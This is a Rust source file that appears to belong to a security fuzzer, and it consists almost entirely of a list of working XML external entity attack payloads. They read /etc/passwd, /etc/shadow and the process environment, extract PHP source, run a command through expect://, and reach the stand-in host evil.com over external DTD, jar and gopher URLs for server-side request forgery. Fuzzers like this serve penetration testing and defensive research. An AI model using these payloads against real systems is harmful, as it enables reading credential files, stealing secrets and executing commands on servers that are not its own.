use crate::fuzzer::payloads::{Payload, PayloadType, Severity};

pub fn get_payloads() -> Vec<Payload> {
    vec![
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>"#.to_string(),
            description: "Basic XXE file read".to_string(),
            severity: Severity::Critical,
            tags: vec!["xxe".to_string(), "file-read".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo>"#.to_string(),
            description: "XXE /etc/shadow read".to_string(),
            severity: Severity::Critical,
            tags: vec!["xxe".to_string(), "file-read".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///">]><foo>&xxe;</foo>"#.to_string(),
            description: "XXE directory listing".to_string(),
            severity: Severity::High,
            tags: vec!["xxe".to_string(), "directory".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com/evil.dtd">]><foo>&xxe;</foo>"#.to_string(),
            description: "XXE external entity".to_string(),
            severity: Severity::Critical,
            tags: vec!["xxe".to_string(), "ssrf".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd">%xxe;]>"#.to_string(),
            description: "XXE parameter entity".to_string(),
            severity: Severity::Critical,
            tags: vec!["xxe".to_string(), "parameter-entity".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///proc/self/environ">]><foo>&xxe;</foo>"#.to_string(),
            description: "XXE read process environment".to_string(),
            severity: Severity::High,
            tags: vec!["xxe".to_string(), "env".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]><foo>&xxe;</foo>"#.to_string(),
            description: "XXE expect protocol".to_string(),
            severity: Severity::Critical,
            tags: vec!["xxe".to_string(), "rce".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><foo>&xxe;</foo>"#.to_string(),
            description: "XXE PHP filter read source".to_string(),
            severity: Severity::High,
            tags: vec!["xxe".to_string(), "file-read".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:http://evil.com/evil.jar!/file">]><foo>&xxe;</foo>"#.to_string(),
            description: "XXE jar protocol".to_string(),
            severity: Severity::High,
            tags: vec!["xxe".to_string(), "ssrf".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "gopher://evil.com/_test">]><foo>&xxe;</foo>"#.to_string(),
            description: "XXE gopher protocol SSRF".to_string(),
            severity: Severity::High,
            tags: vec!["xxe".to_string(), "ssrf".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="file:///etc/passwd"/></foo>"#.to_string(),
            description: "XXE XInclude".to_string(),
            severity: Severity::Critical,
            tags: vec!["xxe".to_string(), "xinclude".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0" standalone="yes"?><!DOCTYPE foo [<!ENTITY % swaliatd SYSTEM "file:///etc/passwd">]>"#.to_string(),
            description: "XXE alternative doctype".to_string(),
            severity: Severity::Critical,
            tags: vec!["xxe".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0"?><root><item>&amp;</item></root>"#.to_string(),
            description: "XXE entity encoding test".to_string(),
            severity: Severity::Medium,
            tags: vec!["xxe".to_string(), "encoding".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "data://text/plain;base64,Zm9v">]><foo>&xxe;</foo>"#.to_string(),
            description: "XXE data protocol".to_string(),
            severity: Severity::High,
            tags: vec!["xxe".to_string(), "data-protocol".to_string()],
        },
        Payload {
            payload_type: PayloadType::Xxe,
            payload: r#"<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "netdoc:///etc/hosts">]><foo>&xxe;</foo>"#.to_string(),
            description: "XXE netdoc protocol".to_string(),
            severity: Severity::High,
            tags: vec!["xxe".to_string(), "file-read".to_string()],
        },
    ]
}
